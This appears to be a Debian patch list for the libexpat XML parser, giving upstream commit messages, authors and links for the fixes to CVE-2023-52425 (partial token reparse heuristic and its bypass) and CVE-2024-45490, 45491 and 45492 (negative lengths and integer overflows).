Autotools-Give-test-suite-access-to-internal-symbols.patch Autotools: Give test suite access to internal symbols Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/f01a61402cd44bb0cb59db43e70309c01acc50d1 2021-04-05
CVE-2023-52425/05-9fe3672.patch tests: Run both with and without partial token heuristic
If we always run with the heuristic enabled, it may hide some bugs by
grouping up input into bigger parse attempts.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/9fe3672459c1bf10926b85f013aa1b623d855545 2023-09-18
CVE-2023-52425/06-f1eea78.patch tests: Add max_slowdown info in test_big_tokens_take_linear_time Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/f1eea784d0429bc4813a3d66a8e24e6c9df56be7 2023-11-06
CVE-2023-52425/07-09957b8.patch Allow XML_GetBuffer() with len=0 on a fresh parser
len=0 was previously OK if there had previously been a non-zero call.
It makes sense to allow an application to work the same way on a
newly-created parser, and not have to care if its incoming buffer
happens to be 0.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/09957b8ced725b96a95acff150facda93f03afe1 2023-10-26
CVE-2023-52425/08-1d3162d.patch Add app setting for enabling/disabling reparse heuristic Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/1d3162da8a85a398ab451aadd6c2ad19587e5a68 2023-09-11
CVE-2023-52425/09-8ddd8e8.patch Try to parse even when incoming len is zero
If the reparse deferral setting has changed, it may be possible to
finish a token.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/8ddd8e86aa446d02eb8d398972d3b10d4cad908a 2023-09-29
CVE-2023-52425/10-ad9c01b.patch Make external entity parser inherit partial token heuristic setting
The test is essentially a copy of the existing test for the setter,
adapted to run on the external parser instead of the original one.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/ad9c01be8ee5d3d5cac2bfd3949ad764541d35e7 2023-10-26
CVE-2023-52425/11-60b7420.patch Bypass partial token heuristic when close to maximum buffer size
For huge tokens, we may end up in a situation where the partial token
parse deferral heuristic demands more bytes than Expat's maximum buffer
size (currently ~half of INT_MAX) could fit.

INT_MAX/2 is 1024 MiB on most systems. Clearly, a token of 950 MiB could
fit in that buffer, but the reparse threshold might be such that
callProcessor() will defer it, allowing the app to keep filling the
buffer until XML_GetBuffer() eventually returns a memory error.

By bypassing the heuristic when we're getting close to the maximum
buffer size, it will once again be possible to parse tokens in the size
range INT_MAX/2/ratio < size < INT_MAX/2 reliably.

We subtract the last buffer fill size as a way to detect that the next
XML_GetBuffer() call has a risk of returning a memory error -- assuming
that the application is likely to keep using the same (or smaller) fill.

We subtract XML_CONTEXT_BYTES because that's the maximum amount of bytes
that could remain at the start of the buffer, preceding the partial
token. Technically, it could be fewer bytes, but XML_CONTEXT_BYTES is
normally small relative to INT_MAX, and is much simpler to use.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/60b74209899a67d426d208662674b55a5eed918c 2023-10-04
CVE-2023-52425/12-3d8141d.patch Bypass partial token heuristic when nearing full buffer
...instead of only when approaching the maximum buffer size INT_MAX/2+1.

We'd like to give applications a chance to finish parsing a large token
before buffer reallocation, in case the reallocation fails.

By bypassing the reparse deferral heuristic when getting close to
filling the buffer, we give them this chance -- if the whole token is
present in the buffer, it will be parsed at that time.

This may come at the cost of some extra reparse attempts. For a token
of n bytes, these extra parses cause us to scan over a maximum of
2n bytes (... + n/8 + n/4 + n/2 + n). Therefore, parsing of big tokens
remains O(n) in regard to how many bytes we scan in attempts to parse. The
cost in reality is lower than that, since the reparses that happen due
to the bypass will affect m_partialTokenBytesBefore, delaying the next
ratio-based reparse. Furthermore, only the first token that "breaks
through" a buffer ceiling takes that extra reparse attempt; subsequent
large tokens will only bypass the heuristic if they manage to hit the
new buffer ceiling.

Note that this cost analysis depends on the assumption that Expat grows
its buffer by doubling it (or, more generally, grows it exponentially).
If this changes, the cost of this bypass may increase. Hopefully, this
would be caught by test_big_tokens_take_linear_time or the new test.

The bypass logic assumes that the application uses a consistent fill.
If the app increases its fill size, it may miss the bypass (and the
normal heuristic will apply). If the app decreases its fill size, the
bypass may be hit multiple times for the same buffer size. The very
worst case would be to always fill half of the remaining buffer space,
in which case parsing of a large n-byte token becomes O(n log n).

As an added bonus, the new test case should be faster than the old one,
since it doesn't have to go all the way to 1GiB to check the behavior.

Finally, this change necessitated a small modification to two existing
tests related to reparse deferral. These tests are testing the deferral
enabled setting, and assume that reparsing will not happen for any other
reason. By pre-growing the buffer, we make sure that this new deferral
does not affect those test cases.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/3d8141d26a3b01ff948e00956cb0723a89dadf7f 2023-11-20
CVE-2023-52425/13-8f8aaf5.patch tests: Check heuristic bypass with varying buffer fill sizes
The bypass works on the assumption that the application uses a
consistent fill size. Let's make some assertions about what should
happen when the application doesn't do that -- most importantly,
that parsing does happen eventually, and that the number of scanned
bytes doesn't explode.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/8f8aaf5c8e8a6e812dd8dadd96cf9bd044bc085a 2023-11-24
CVE-2023-52425/14-09fdf99.patch xmlwf: Support disabling reparse deferral Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/09fdf998e7cf3f8f9327e6602077791095aedd4d 2023-11-09
CVE-2023-52425/15-d5b02e9.patch xmlwf: Document argument "-q" Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/d5b02e96ab95d2a7ae0aea72d00054b9d036d76d 2023-11-09
CVE-2024-45490/01-5c1a316.patch lib: Reject negative len for XML_ParseBuffer
Reported by TaiYou
Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/5c1a31642e243f4870c0bd1f2afc7597976521bf 2024-08-19
CVE-2024-45490/02-c12f039.patch tests: Cover "len < 0" for both XML_Parse and XML_ParseBuffer Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/c12f039b8024d6b9a11c20858370495ff6ff5245 2024-08-20
CVE-2024-45490/03-2db2330.patch doc: Document that XML_Parse/XML_ParseBuffer reject "len < 0" Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/2db233019f551fe4c701bbbc5eb0fa58ff349daa 2024-08-25
CVE-2024-45491.patch lib: Detect integer overflow in dtdCopy
Reported by TaiYou
Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/8e439a9947e9dc80a395c0c7456545d8d9d9e421 2024-08-19
CVE-2024-45492.patch lib: Detect integer overflow in function nextScaffoldPart
Reported by TaiYou
Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/9bf0f2c16ee86f644dd1432507edff94c08dc232 2024-08-19
